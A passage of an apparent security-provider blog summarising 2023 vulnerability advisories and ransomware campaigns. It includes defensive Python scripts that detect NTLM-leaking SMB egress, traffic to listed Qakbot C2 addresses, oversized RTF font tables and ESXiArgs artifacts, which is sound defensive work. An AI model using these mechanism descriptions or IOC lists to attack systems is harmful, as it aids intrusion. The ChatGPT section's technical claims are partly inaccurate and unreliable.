At this time, there are no complete fixes for these four vulnerabilities, just temporary workarounds. However, staying current on patches and the most recent versions of all devices, software, and applications is crucial.

Instructions for turning off Bluetooth sharing on VMware Workstation Pro, Workstation Player, and VMware Fusion, and for removing the CD/DVD device or configuring the VM not to use a virtual SCSI controller, are in the VMware advisory (VMSA-2023-0008) listed under Sources below.

As a Managed Service Provider (MSP) and Managed Security Service Provider (MSSP), we specialize in providing customizable IT solutions and cybersecurity services for businesses in New York State. So, if you need assistance maintaining the security of your IT infrastructure, contact us today.

Sources

https://www.bleepingcomputer.com/news/security/vmware-fixes-critical-zero-day-exploit-chain-used-at-pwn2own/

https://www.vmware.com/security/advisories/VMSA-2023-0008.html

https://www.helpnetsecurity.com/2023/04/26/cve-2023-20869-cve-2023-20870/

Overview – Malware Targets EDR & MDR Software

EDR and MDR tools have become a massive part of detecting, responding to, and monitoring cyber threats and stopping attacks. Endpoint Detection & Response (EDR) and Managed Detection & Response (MDR) are tools deployed on a device to protect a particular endpoint and provide security monitoring and management across an organization’s entire IT environment.

New AuKill Malware

Recently, however, threat actors have been using a new hacking tool called AuKill that can disable the EDR software on a target’s system before deploying backdoors or ransomware. This is a Bring Your Own Vulnerable Driver (BYOVD) attack: the malicious actor plants a legitimate driver, signed with a valid certificate and capable of running with kernel privileges on the victim’s device, then uses it to disable the EDR solution and take over the system. Attacks of this type come from all kinds of threat actors, from state-backed hacking groups to financially motivated ransomware groups.

How AuKill Malware Disables Security Software

Sophos X-Ops discovered the AuKill malware. They found that AuKill drops a vulnerable Windows driver (procexp.sys) next to the one used by Microsoft’s Process Explorer v16.32, a common and legitimate utility for collecting information on active Windows processes. It then moves to disable the EDR software: AuKill starts several threads that check for and disable the security services and prevent them from restarting, in order to avoid detection. See the articles below for more information on the exact steps AuKill takes to stop an EDR solution.

While there are no set remediations at the moment, the following can help protect against a future attack:

  1. If you have an EDR security service in place, enable tamper protection for its agent so that unwanted processes cannot interfere with its ability to run.
  2. Ensure that user and admin privileges are separated to prevent privilege escalation attacks.
  3. Stay up to date on patches, maintaining the latest versions of devices, applications, and tools within the system.
  4. Maintain vulnerability management within your environment to detect any flaws.


Sources

https://www.bleepingcomputer.com/news/security/ransomware-gangs-abuse-process-explorer-driver-to-kill-security-software/

https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/

Overview of the QNAP Zero-Days

Several zero-day vulnerabilities have been discovered in QNAP (Quality Network Appliance Provider) operating systems for Network Attached Storage (NAS), and they now impact over 80,000 devices. They were discovered as zero-days and remain unpatched for two of the four affected operating systems. QNAP provides network-attached storage appliances used for file sharing, storage management, surveillance applications, and virtualization. In short, a QNAP device is the place to back up all of your important files, photos, media, and music: an overall storage hub.

The vulnerabilities are tracked as CVE-2022-27597 and CVE-2022-27598. They are memory access violations that can cause unstable code and give an authenticated cybercriminal a path to execute arbitrary code. If exploited, they allow remote authenticated users to obtain secret values.

These vulnerabilities affect the QTS, QuTS hero, QuTScloud, and QVP operating systems. QNAP has released fixed versions: QTS 5.0.1.2346 build 20230322 and later, and QuTS hero h5.0.1.2348 build 20230324 and later. Unfortunately, QuTScloud and QVP OS remain unpatched, though QNAP is working on a fix for these flaws.

If your device is affected, you can secure it by regularly updating your system to the latest version, which is a common best practice used for many appliances and software versions. If these vulnerabilities have impacted your device, follow the steps below to update or visit the QNAP website for more information.

How to update your QTS, QuTS hero, or QuTScloud device:

  1. First, log in to QTS, QuTS hero, or QuTScloud as an administrator.
  2. Then, go to Control Panel > System > Firmware Update.
  3. Finally, under Live Update, click Check for Updates. This will automatically choose the latest version and install it. You can also download the update from the QNAP website. Go to Support > Download Center and perform a manual update for your device.

How to update your QVP (QVP Pro Appliances):

  1. First, log in to QVP as an administrator.
  2. Then, go to Control Panel > System Settings > Firmware Update.
  3. Next, select the Firmware Update tab.
  4. Click Browse to upload the latest firmware file.
  5. Lastly, click Update System to install the update. (You can also download the latest firmware file for your specific device from https://qnap.com/go/download.)

If your organization could benefit from managed security services to help keep your network and devices secure, consider speaking with an expert at M.A. Polce for help. As a managed service provider (MSP) and managed security service provider (MSSP), we specialize in a wide range of services, including IT support, network security, professional IT services, cyber risk management & compliance, consulting, and more. Contact us today to learn more about how we can assist your organization.

Sources

https://www.qnap.com/en-us/security-advisory/qsa-23-06

https://www.qnap.com/en-us/security-advisories?ref=security_advisory_details

https://www.darkreading.com/vulnerabilities-threats/qnap-zero-days-80k-devices-vulnerable-cyberattack

Overview

Microsoft has disclosed a new critical vulnerability, scoring 9.8 out of a maximum of 10 on the CVSS scale. The vulnerability, CVE-2023-23397, is an Elevation of Privilege (EoP) vulnerability in Microsoft Outlook. An attacker triggers it by sending a message carrying an extended property that contains a UNC file path to an SMB (port 445) share on a server the attacker controls. The resulting connection leaks the NTLM hash, which is derived from the Windows user’s account password, and the attacker uses it to escalate through the account.

Unlike many email-based attacks, this attack’s success does not depend on the recipient’s actions once the malicious email hits their inbox. No action is needed because this specific vulnerability triggers on the email server side. This means the exploit occurs before a victim ever sees the malicious content. In other words, without clicking or even reading the email, the attack will commence.

CVE-2023-23397 affects the 32-bit and 64-bit versions of Microsoft 365 Apps for Enterprise and of Office 2013, 2016, and 2019. Microsoft-hosted online services, such as Microsoft 365, are not vulnerable.

Malicious actors have targeted this vulnerability within government, military, energy, and transportation organizations. But, the reach of these attacks will only increase once threat actors realize how simple it is to target and attack someone using this vulnerability.

Recently, Microsoft released a security update to resolve the issue, which you can find in the first link below.

Recommended Action Items for Affected Microsoft Outlook Users:

  • Ensure you are running the most up-to-date version of Microsoft Outlook on your device. Microsoft has also recommended that customers disable the WebClient service on their organization’s machines.
  • Block TCP port 445 (SMB) outbound from your network using a perimeter firewall, local firewall, and VPN settings. Doing so prevents NTLM authentication messages from being sent to remote file shares.
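
The port 445 block recommended above, and the port 65400 block from the Qakbot section earlier on this page, can both be checked after the fact in firewall logs. The following is an added example, not from Microsoft or the original advisories: it reads constructed firewall log lines and flags outbound SMB from an internal host to a non-internal address (the NTLM leak path of CVE-2023-23397), connections to TCP 65400, and connections to the Qakbot addresses listed in the table above (refanged here so they parse). The log format, the RFC 1918 definition of "internal", and all sample addresses are this example's assumptions.

```python
"""Flag the egress patterns the Outlook and Qakbot advisories say to block."""
import ipaddress
from typing import Dict, List, Optional

# Assumption: the organisation's internal address space is the RFC 1918 ranges.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Refanged copies of the Qakbot C2 addresses from the table in the Qakbot section.
QAKBOT_IOCS = {"172.107.98.3", "23.111.114.52", "94.103.85.86",
               "99.228.131.116", "47.205.25.170", "79.47.207.6"}

# Constructed log excerpt, one connection per line: "timestamp key=value ...".
SAMPLE_LOG = """\
2023-03-14T09:58:01Z src=10.0.5.21 dst=10.0.1.5 proto=tcp dport=445 action=allow
2023-03-14T09:59:14Z src=10.0.5.21 dst=203.0.113.7 proto=tcp dport=445 action=allow
2023-03-14T10:02:37Z src=10.0.7.44 dst=198.51.100.23 proto=tcp dport=65400 action=allow
2023-03-14T10:03:02Z src=10.0.7.44 dst=198.51.100.23 proto=tcp dport=443 action=allow
2023-03-14T10:05:00Z src=10.0.5.21 dst=203.0.113.7 proto=tcp dport=445 action=deny
2023-03-14T10:07:12Z src=10.0.7.44 dst=94.103.85.86 proto=tcp dport=443 action=allow
"""


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def parse_line(line: str) -> Dict[str, str]:
    """Turn 'ts k=v k=v ...' into a dict; the timestamp lands under 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split() if "=" in kv)
    fields["ts"] = ts
    return fields


def classify(ev: Dict[str, str]) -> Optional[str]:
    """Name the rule an event matches, or None if it is unremarkable."""
    if ev["dst"] in QAKBOT_IOCS:
        return "destination is a listed Qakbot C2 address"
    if ev.get("proto", "tcp") != "tcp":
        return None
    dport = int(ev.get("dport", 0))
    if dport == 445 and not is_internal(ev["dst"]):
        return "SMB to non-internal host (CVE-2023-23397 NTLM leak path)"
    if dport == 65400:
        return "connection to TCP 65400 (Qakbot C2 listener port)"
    return None


def find_suspicious_egress(log_text: str) -> List[Dict[str, str]]:
    """One finding per matching line, whether the firewall allowed or denied it.

    Denied attempts are kept on purpose: a workstation trying to reach port 445
    on the internet is itself a sign that a message with a malicious UNC path
    was processed, even when the firewall stopped the connection.
    """
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        if not is_internal(ev.get("src", "0.0.0.0")):
            continue  # only egress from our own hosts is of interest here
        rule = classify(ev)
        if rule:
            findings.append({"ts": ev["ts"], "src": ev["src"], "dst": ev["dst"],
                             "dport": ev["dport"], "action": ev.get("action", "?"),
                             "rule": rule})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_egress(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} -> {f['dst']}:{f['dport']} [{f['action']}] {f['rule']}")
```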

Microsoft’s Patch Tuesday routinely brings unexpected yet pressing news about updates and new vulnerabilities. Staying in the loop with these releases will help you stay current on the most recent versions of your applications and keep your organization from being exposed to bugs.

Sources

https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-outlook-2016-march-14-2023-kb5002254-a2a882e6-adad-477a-b414-b0d96c4d2ce3 – Microsoft Security Update
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23397 – CVE-2023-23397
https://krebsonsecurity.com/2023/03/microsoft-patch-tuesday-march-2023-edition/
https://www.helpnetsecurity.com/2023/03/14/cve-2023-23397-cve-2023-24880/

Overview

Fortinet warns of a new critical buffer underwrite vulnerability that affects FortiOS and FortiProxy. Tracked as CVE-2023-25610, it allows an unauthenticated attacker to execute arbitrary code or cause a denial of service through the device’s graphical user interface. The vulnerability was uncovered internally while reviewing and testing the security of the company’s products, and Fortinet is not aware of it being exploited in the wild.

This Flaw Affects Multiple Devices, Including:

  • FortiOS version 7.2.0 through 7.2.3
  • FortiOS version 7.0.0 through 7.0.9
  • FortiOS version 6.4.0 through 6.4.11
  • FortiOS version 6.2.0 through 6.2.12
  • FortiOS 6.0, all versions
  • FortiProxy version 7.2.0 through 7.2.2
  • FortiProxy version 7.0.0 through 7.0.8
  • FortiProxy version 2.0.0 through 2.0.11
  • FortiProxy 1.2, all versions
  • FortiProxy 1.1, all versions

Additionally, it is important to know that some hardware devices running an affected version of FortiOS are only impacted by the denial of service issue.

If users cannot update their devices, Fortinet offers a workaround: disable the HTTP/HTTPS administrative interface, or limit the IP addresses that can reach it remotely, right away.

However, if possible, you should update your current version if it is listed above as vulnerable.

Fortinet Recommends Upgrading to the Following Fixed Versions to Eliminate the Risk of this Vulnerability:

  • FortiOS version 7.4.0 or above
  • FortiOS version 7.2.4 or above
  • FortiOS version 7.0.10 or above
  • FortiOS version 6.4.12 or above
  • FortiOS version 6.2.13 or above
  • FortiProxy version 7.2.3 or above
  • FortiProxy version 7.0.9 or above
  • FortiProxy version 2.0.12 or above
  • FortiOS-6K7K version 7.0.10 or above
  • FortiOS-6K7K version 6.4.12 or above
  • FortiOS-6K7K version 6.2.13 or above

In conclusion, staying current on patches and regularly checking for updates is important to ensure your devices and organization are not exposed to vulnerabilities. With this in mind, see the security updates below for more information on FortiOS and FortiProxy versions.

Sources

https://www.fortiguard.com/psirt/FG-IR-23-001 – FortiGuard Security Update
https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critical-unauthenticated-rce-vulnerability/
https://www.helpnetsecurity.com/2023/03/09/cve-2023-25610/

Overview

On February 14, 2023, Microsoft released a security advisory for Microsoft Word regarding a critical remote code execution (RCE) vulnerability. The vulnerability, CVE-2023-21716, was rated critical but deemed “less likely” to be exploited, with no proof-of-concept (PoC) exploit attached. Within the last few days, however, a security researcher released a PoC exploit for this CVE on Twitter.

Security researcher Joshua Drake revealed that remote attackers could use the issue to execute code with the same privileges as the victim who opens the malicious .RTF document.

Adding to the concern, many methods exist to deliver the malicious file to victims—one of the easiest options being to attach it to an email in a phishing attempt. 

As Microsoft warns, all it takes to trigger the compromise is to load the file in the Preview Pane. The Rich Text Format (RTF) parser in Word has a memory corruption vulnerability that is triggered when it processes a font table (\fonttbl) containing an excessive number of fonts (\f###).
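Because the trigger described above is an oversized font table, a mail gateway can triage RTF attachments by counting the fonts they declare before Word ever parses them. The following is an added example, not Microsoft's tooling and not a detection from the advisory: a small brace-aware scanner isolates the \fonttbl group and counts the distinct \fN identifiers in it. ASSUMED_MAX_FONTS is an arbitrary triage threshold of this example, not the count that triggers the bug (which the advisory does not give), and make_rtf() builds constructed sample documents.

```python
r"""Triage RTF attachments by counting the fonts declared in \fonttbl."""
import re
from typing import Dict

FONT_ID = re.compile(rb"\\f(\d+)")  # \f0, \f1, ... as written inside the font table
ASSUMED_MAX_FONTS = 64              # assumption: ordinary documents declare far fewer


def font_table(rtf: bytes) -> bytes:
    r"""Return the raw bytes of the {\fonttbl ...} group, or b"" if absent."""
    start = rtf.find(b"\\fonttbl")
    if start < 0:
        return b""
    i = rtf.rfind(b"{", 0, start)   # the brace that opens the fonttbl group
    if i < 0:
        return b""
    depth, j = 0, i
    while j < len(rtf):
        b = rtf[j]
        if b == 0x5C:               # backslash: \{ \} or a control word, never a brace
            j += 2
            continue
        if b == 0x7B:               # {
            depth += 1
        elif b == 0x7D:             # }
            depth -= 1
            if depth == 0:
                return rtf[i:j + 1]
        j += 1
    return rtf[i:]                  # unterminated group: take what is there


def count_fonts(rtf: bytes) -> int:
    """Number of distinct font ids declared in the document's font table."""
    return len(set(FONT_ID.findall(font_table(rtf))))


def triage(rtf: bytes, limit: int = ASSUMED_MAX_FONTS) -> Dict[str, object]:
    """Verdict for a gateway policy: hold the file when the font table is oversized."""
    n = count_fonts(rtf)
    return {"fonts": n, "suspicious": n > limit}


def make_rtf(n_fonts: int) -> bytes:
    """Constructed sample: a minimal RTF declaring n_fonts fonts and one line of text."""
    entries = b"".join(b"{\\f%d\\fswiss\\fcharset0 Font%d;}" % (i, i) for i in range(n_fonts))
    return b"{\\rtf1\\ansi{\\fonttbl" + entries + b"}\\f0\\fs24 Hello, world.\\par}"


if __name__ == "__main__":
    for n in (3, 80):
        print(n, "fonts ->", triage(make_rtf(n)))
```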

What You Can Do

Microsoft has released a few workarounds, the simplest of which requires users to apply the security update which Microsoft shared. Multiple versions of Office have been affected, and there are different instructions for each, including Office 2013, Office 2016, Office 2019, and Office 2021. You can find these at the first link listed below.

Another tip Microsoft recommends is to read emails in plain text format. Emails in this format do not include rich content such as pictures and specialized fonts, so this option keeps users from opening email attachments or associated malicious links. Plain text is typically not the default for email users and must be configured so that all standard mail is read in plain text; Microsoft Knowledge Base article 831607 explains how to do this.

Another workaround is to enable the Microsoft Office File Block policy, which stops Office applications from opening RTF documents of unknown or untrusted origin. This requires modifying the Windows Registry, which, if done incorrectly, can cause further problems on your device.

It is crucial to stay current on the latest exploits and update to the latest versions of software available to protect your devices, applications, and organization from vulnerabilities.

Sources

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-21716 – Microsoft Update
https://nvd.nist.gov/vuln/detail/CVE-2023-21716 – NIST NVD
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21716 – CVE-2023-21716
https://www.bleepingcomputer.com/news/security/proof-of-concept-released-for-critical-microsoft-word-rce-bug/

Overview

Chatbots are simulation applications that function as if you’re conversing with someone over the Internet. Many organizations use chatbots for customer support issues, and some chatbots are offered as services to help with art and creativity. As the popularity of these chatbots grows, so does the malicious intent of cyber criminals.

One popular chatbot that has been in the news for the past few weeks is ChatGPT. It was only launched at the end of November 2022 and is said to be a new generation of AI systems that can converse, generate readable text on demand, and produce images and videos based on a database of stored information.

However, there has been some backlash from many users facing issues or foreseeing them. Some of these problems encompass ChatGPT-enabled phishing attempts that lead to spam websites, increased plagiarism in the academic environment, and chatbot customer support options obtaining sensitive information.

The technology functions using a database to generate keywords and phrases towards a topic that can create a constant conversation or generate ideas to complete complex tasks.

Many organizations, such as financial and educational institutions, are restricting the use of ChatGPT because of the negative impacts that can result from overuse and abuse. In the school setting, the concern involves how this technology can undercut the education process. Students can ask ChatGPT to write them an essay, which the bot can complete in minutes. This is problematic because students are missing the opportunity to build critical thinking and problem-solving skills.

It’s also important to know that chatbots don’t just show up when you are looking for help; they can also reach out to you. These can be seen in phishing attempts looking for your personal information. The bots provide urgent warnings to grab your attention and deceive you into entering credentials or sensitive data readily available to the malicious hacker.

It may be hard to tell an artificial intelligence conversation from a human one when you need its service, but there are a few things to keep an eye out for:

  • Look for the absence of compassion and a lack of experience.
  • Check for errors in the writing styles and inconsistency in wording.
  • Keep an eye out for filler words or repetitive phrases.
  • Don’t click on links unless they are directly from the secure website.
  • Do not share or enter credentials unless the messages are legitimate.

ChatGPT is not the first or last form of this type of AI that we will see. As these technologies emerge and develop, it is important to be vigilant of red flags before a simple request turns into a malicious event.

Sources

https://apnews.com/article/what-is-chat-gpt-ac4967a4fb41fda31c4d27f015e32660

https://www.nbcnews.com/tech/tech-news/new-york-city-public-schools-ban-chatgpt-devices-networks-rcna64446

Overview

Throughout the past week, Fortinet released numerous security advisories announcing patches for product vulnerabilities. These releases address critical flaws affecting FortiNAC and FortiWeb products. Two of the 40 advisories Fortinet released during the week carry a ‘critical’ severity rating, and fifteen of the 40 are marked ‘high’ severity.

One of the critical advisories addresses CVE-2021-42756, a CVE identifier “assigned to multiple stack-based buffer overflow vulnerabilities in FortiWeb’s proxy daemon.” If the hole is exploited, an unauthenticated remote attacker could execute arbitrary code on a targeted system using malicious HTTP requests. Below are the versions Fortinet lists as vulnerable, followed by the fixed versions to which all devices should be updated.

FortiWeb Impacted Versions:

  • FortiWeb 5.x, all versions
  • FortiWeb versions 6.0.7 and below
  • FortiWeb versions 6.1.2 and below
  • FortiWeb versions 6.2.6 and below
  • FortiWeb versions 6.3.16 and below
  • FortiWeb 6.4, all versions

FortiWeb Fixed Versions:

  • FortiWeb 7.0.0 or above
  • FortiWeb 6.3.17 or above
  • FortiWeb 6.2.7 or above
  • FortiWeb 6.1.3 or above
  • FortiWeb 6.0.8 or above

A second critical advisory, CVE-2022-39952 (FG-IR-22-300), is an external control of file name or path issue in FortiNAC. An unauthenticated attacker can control the file name or path handled by FortiNAC's keyUpload script, giving them an arbitrary file write on the vulnerable system.

FortiNAC Impacted Versions:

  • FortiNAC versions 9.4.0
  • FortiNAC versions 9.2.0 through 9.2.5
  • FortiNAC versions 9.1.0 through 9.1.7
  • FortiNAC 8.8, all versions
  • FortiNAC 8.6, all versions
  • FortiNAC 8.5, all versions
  • FortiNAC 8.3, all versions


FortiNAC Fixed Versions:

  • FortiNAC version 9.4.1 or above
  • FortiNAC version 9.2.6 or above
  • FortiNAC version 9.1.8 or above
  • FortiNAC version 7.2.0 or above



Make sure every affected device above is patched, prioritizing the critical and high-severity issues, but remember that the advisories with lower CVSS scores released alongside them still pose a threat to your environment.

Sources

https://www.securityweek.com/fortinet-patches-critical-code-execution-vulnerabilities-in-fortinac-fortiweb/

https://www.fortiguard.com/psirt/FG-IR-22-300 – FortiNAC vulnerability

https://www.fortiguard.com/psirt/FG-IR-21-186 – FortiWeb Vulnerability

Overview

Citrix has released security updates for newly disclosed vulnerabilities in Citrix Workspace app and Citrix Virtual Apps and Desktops. If these products are in use, address the vulnerabilities immediately to prevent attackers from exploiting them and taking unauthorized control of devices and systems.

Updates for Known Vulnerabilities

  1. CVE-2023-24486 (CTX477618 on the Citrix Support site) affects Citrix Workspace app for Linux. If exploited, a malicious local user could gain access to the Citrix Virtual Apps and Desktops session of another user who launches the ICA session from the same computer. All supported versions of Citrix Workspace app for Linux before 2302 are affected; update to 2302 or later as soon as possible.
  2. CVE-2023-24484 and CVE-2023-24485 (CTX477617) affect Citrix Workspace app for Windows and allow a standard Windows user to perform operations as SYSTEM on a computer running the app. Update to one of: Citrix Workspace app 2212 or later; 2203 LTSR CU2 or later cumulative updates; or 1912 LTSR CU7 Hotfix 2 (19.12.7002) or later cumulative updates.
  3. CVE-2023-24483 (CTX477616) affects the Windows VDA in Citrix Virtual Apps and Desktops and allows a local user to escalate privileges to NT AUTHORITY\SYSTEM. Update to one of: Citrix Virtual Apps and Desktops 2212 or later; 2203 LTSR CU2 or later cumulative updates; or 1912 LTSR CU6 or later cumulative updates.

Always update to the latest version of your devices and software, especially once vulnerabilities have been publicly reported. For more information on these vulnerabilities and links to the updates, see the Citrix Support pages listed in the sources below.

Sources

https://www.cisa.gov/uscert/ncas/current-activity/2023/02/14/citrix-releases-security-updates-workspace-apps-virtual-apps-and – CISA Update

https://support.citrix.com/article/CTX477618/citrix-workspace-app-for-linux-security-bulletin-for-cve202324486 – CTX477618

https://support.citrix.com/article/CTX477617/citrix-workspace-app-for-windows-security-bulletin-for-cve202324484-cve202324485 – CTX477617

https://support.citrix.com/article/CTX477616/citrix-virtual-apps-and-desktops-security-bulletin-for-cve202324483 – CTX477616

Overview

CISA, together with partner agencies, publishes joint Cybersecurity Advisories (CSAs) under the #StopRansomware campaign covering ransomware threat actors worldwide. A recent one (AA23-040A) documents the Tactics, Techniques, and Procedures (TTPs) and Indicators of Compromise (IoCs) of state-sponsored cyber actors from the DPRK (the Democratic People's Republic of Korea, i.e. North Korea). These actors have been targeting Healthcare and Public Health organizations, encrypting their records and taking over their systems, and refusing to release them without payment in cryptocurrency.

Some distinguishable TTPs that have been traced to the ransomware attacks include:

  • Acquire infrastructure: the actors generate domains, personas, and accounts and identify cryptocurrency services to use in ransomware operations.
  • Obfuscate identity: the actors deliberately obscure their involvement, for example by operating through third-party affiliates who receive the ransom payments.
  • Purchase VPNs and VPSs: the actors use virtual private networks and virtual private servers to appear to operate from locations outside the DPRK.
  • Gain access: the actors exploit known vulnerabilities to gain access and escalate privileges on networks; CVEs tied to recent DPRK activity include CVE-2021-44228 (Log4Shell), CVE-2021-20038 (SonicWall SMA), and CVE-2022-24990 (TerraMaster NAS).
  • Move laterally and discover: once inside, the actors use staged payloads with malware to download additional files, execute shell commands, and more, and to steal victim information and send it to a remote host under their control.
  • Employ various ransomware tools: the actors have privately developed ransomware, Maui and H0lyGh0st, and have also been observed using multiple publicly available encryption tools and posing as other ransomware groups.
  • Demand ransom in cryptocurrency: the actors demand payment in Bitcoin; the demand may be delivered one-on-one to a victim by email or directed at a healthcare organization with threats to expose its data to competitors if it does not pay.

 

Mitigations

Because Healthcare and Public Health organizations have been the initial targets, the authoring agencies advise all organizations to:

  • Apply least privilege to access to sensitive data, and implement two-factor authentication and encryption.
  • Limit access to data by requiring a VPN for network services.
  • Turn off weak or unnecessary network device management interfaces (Telnet, SSH, and HTTP on WAN interfaces) and secure the ones that remain with strong passwords and encryption.
  • Secure the collection and storage of any PII, including how it is processed internally and externally.
  • Deploy monitoring tools to spot IoT devices that begin to show signs of compromise.

Separately, but no less important: maintain backups of your data and test restoring them regularly. The simplest way to keep threat actors from entering through a device or application is to patch it promptly when updates are released, and to plan replacement when end-of-life is announced. See CISA's advisory on this campaign for more protective measures and for examples of each TTP listed above.

Whether your organization is in the health sector or not, it is important to be aware and up to date on current ransomware attacks, their tactics, techniques, and procedures that could be floating around your environment.

Sources

https://www.cisa.gov/uscert/ncas/alerts/aa23-040a – CISA Update

https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF – PDF for Sharing

https://www.infosecurity-magazine.com/news/us-warns-critical-sectors-north/ – InfoSecurity update

https://www.cisa.gov/uscert/ncas/alerts/aa22-187a – July 2022 Update CISA

Overview

On February 6, 2023, VMware issued a statement about ongoing exploitation of a vulnerability in ESXi's OpenSLP service. A ransomware campaign is targeting Internet-facing ESXi servers worldwide; it grew rapidly, with approximately 3,000 victims identified by the morning of Monday, February 6. The malware, dubbed ESXiArgs, is deployed through a remote code execution vulnerability that is two years old: CVE-2021-21974, a heap overflow in OpenSLP. The scale of the campaign shows how many servers have been left unpatched, with the SLP service still running and the OpenSLP port (427) exposed, over those two years. CVE-2021-21974 affects the following releases:

ESXi Vulnerable Versions (CVE-2021-21974)

  • ESXi 7.0: all 7.0 builds prior to ESXi70U1c-17325551
  • ESXi 6.7: all 6.7 builds prior to ESXi670-202102401-SG
  • ESXi 6.5: all 6.5 builds prior to ESXi650-202102101-SG

ESXi Latest Versions (at the time of writing)

  • ESXi 8.0: ESXi80a-20842819
  • ESXi 7.0: ESXi70U3si-20841705
  • ESXi 6.7: ESXi670-202210001

Once ESXiArgs gains access to an ESXi server, it drops encrypt.sh, which performs a series of tasks in /tmp before running the encryption binary. OVHcloud confirmed that the adversary behind the attack:

  • Exploited CVE-2021-21974 for initial access.
  • Encrypted the victim's files with a public key.
  • Targeted virtual machine file extensions: .vmdk, .vmx, .vmxf, .vmsd, .vmsn, .vswp, .vmss, .nvram and .vmem.
  • Attempted to kill each virtual machine's running VMX process to unlock its files.
  • Created an "argsfile" to store the arguments passed to the encryption binary.

ESXiArgs also tries to cover its tracks by removing its own lines from /store/packages/vmtools.py. Open-source reporting on recovered ransom notes shows that ESXiArgs appends the ".args" extension to encrypted files and drops ransom.html and "How to Restore Your Files.html".

Recommendations

If you have ESXi servers, below are recommendations to secure against the threat, as made available to us so far.

  1. Patch or upgrade your ESXi servers.
  2. Disable SLP Service if you are not able to patch immediately.
  3. Do not expose ESXi servers directly to the Internet.

If you have not been affected, patch the servers as soon as possible anyway; in addition, disable the SLP service and make the servers unreachable from the Internet.
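As an added example (not VMware's or any vendor's code), the Python below covers two of the checks behind the recommendations above: whether the SLP service is still enabled on a host, parsed from output of the ESXi commands chkconfig --list and esxcli network firewall ruleset list copied off the host (both sample outputs are constructed), and a sweep of a datastore path for the ESXiArgs artifacts named above (.args files, ransom.html, How to Restore Your Files.html, argsfile). The demo datastore is a scratch directory the script creates itself.

```python
"""ESXiArgs triage: is SLP still enabled on the host, and does a datastore
contain the campaign's artifacts? Added example, not VMware code."""
import os
import re
import tempfile
from typing import Dict, List

# Artifacts reported for ESXiArgs (see the section above).
RANSOM_NOTES = {"ransom.html", "How to Restore Your Files.html"}
ENCRYPTED_EXT = ".args"
ARGS_FILE = "argsfile"


def slpd_enabled(chkconfig_output: str) -> bool:
    """Parse `chkconfig --list` output from an ESXi host; True if slpd is 'on'."""
    for line in chkconfig_output.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "slpd":
            return parts[1].lower() == "on"
    return False


def cimslp_ruleset_enabled(esxcli_output: str) -> bool:
    """Parse `esxcli network firewall ruleset list` output; True if the CIMSLP
    ruleset (port 427) is enabled."""
    for line in esxcli_output.splitlines():
        m = re.match(r"\s*CIMSLP\s+(true|false)\b", line, re.IGNORECASE)
        if m:
            return m.group(1).lower() == "true"
    return False


def sweep_datastore(root: str) -> Dict[str, List[str]]:
    """Walk a datastore path and collect ESXiArgs indicators by category."""
    findings: Dict[str, List[str]] = {"encrypted": [], "ransom_notes": [], "argsfiles": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith(ENCRYPTED_EXT):
                findings["encrypted"].append(path)
            elif name in RANSOM_NOTES:
                findings["ransom_notes"].append(path)
            elif name == ARGS_FILE:
                findings["argsfiles"].append(path)
    return findings


def triage(chkconfig_output: str, esxcli_output: str, datastore_root: str) -> Dict[str, object]:
    """Combine the checks into one verdict for a host."""
    findings = sweep_datastore(datastore_root)
    return {
        "slp_exposed": slpd_enabled(chkconfig_output) or cimslp_ruleset_enabled(esxcli_output),
        "compromised": bool(findings["encrypted"] or findings["ransom_notes"] or findings["argsfiles"]),
        "findings": findings,
    }


# Constructed sample command output; not captured from a real host.
SAMPLE_CHKCONFIG = """DCUI            on
ESXShell        off
SSH             on
slpd            on
"""
SAMPLE_ESXCLI = """Name                Enabled
------------------  -------
sshServer              true
CIMSLP                 true
"""


def build_demo_datastore() -> str:
    """Create a scratch directory that looks like a hit VM folder: two encrypted
    VM files, one ransom note, one argsfile and one untouched file."""
    root = tempfile.mkdtemp(prefix="esxiargs-demo-")
    vm = os.path.join(root, "vm01")
    os.makedirs(vm)
    for name in ("vm01.vmdk.args", "vm01.vmx.args", "ransom.html", "argsfile", "vm01.nvram"):
        with open(os.path.join(vm, name), "w", encoding="utf-8") as fh:
            fh.write("demo\n")
    return root


if __name__ == "__main__":
    result = triage(SAMPLE_CHKCONFIG, SAMPLE_ESXCLI, build_demo_datastore())
    print("SLP exposed:", result["slp_exposed"])
    print("Compromise indicators:", result["compromised"])
    for category, paths in result["findings"].items():
        for p in paths:
            print(f"  {category}: {p}")
```

A host that reports slp_exposed but no findings is the one to fix first: patch it, then stop slpd and disable the CIMSLP ruleset as the recommendations describe.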

Sources

https://www.vmware.com/security/advisories/VMSA-2022-0033.html – VMware Advisory

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974 – CVE

https://www.helpnetsecurity.com/2023/02/06/vmware-esxi-ransomware-cve-2021-21974/

https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/

Overview

Two new security vulnerabilities have been disclosed in Cisco products deployed across many organization types, including industrial plants, large enterprises, manufacturing sites, power grids, and data centers. Exploited by an authenticated attacker with administrative privileges, they give control of the device and a foothold into the wider network. Affected devices include:

  • 800 Series Industrial ISRs
  • CGR1000 Compute Modules
  • IC3000 Industrial Compute Gateways
  • IOS XE-based devices configured with IOx
  • IR510 WPAN Industrial Routers
  • Cisco Catalyst Access Points (COS-APs)

 

